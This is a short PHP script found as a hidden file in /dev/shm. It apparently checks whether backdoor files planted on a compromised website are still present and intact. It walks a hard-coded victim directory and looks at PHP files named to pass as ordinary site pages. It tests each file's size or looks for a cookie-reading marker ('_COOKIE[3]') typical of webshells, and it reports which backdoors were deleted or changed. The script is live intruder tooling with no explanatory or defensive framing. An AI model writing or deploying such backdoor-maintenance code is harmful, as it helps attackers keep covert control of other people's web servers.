File: //dev/shm/.component
<?php $r = '/home/conscdet/lwh.consultwithali.com'; $x = ["/edit_groups.php"=>"bd@@42555464@@_COOKIE[3]",
"/edit.groups.php"=>"bd@@44792656@@2983",
"/edit.groups.php"=>"bd@@45857937@@2983",
"/edit.report05.php"=>"bd@@42527684@@_COOKIE[3]",
"/rate.report05.php"=>"bd@@50535676@@mutex_lock"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');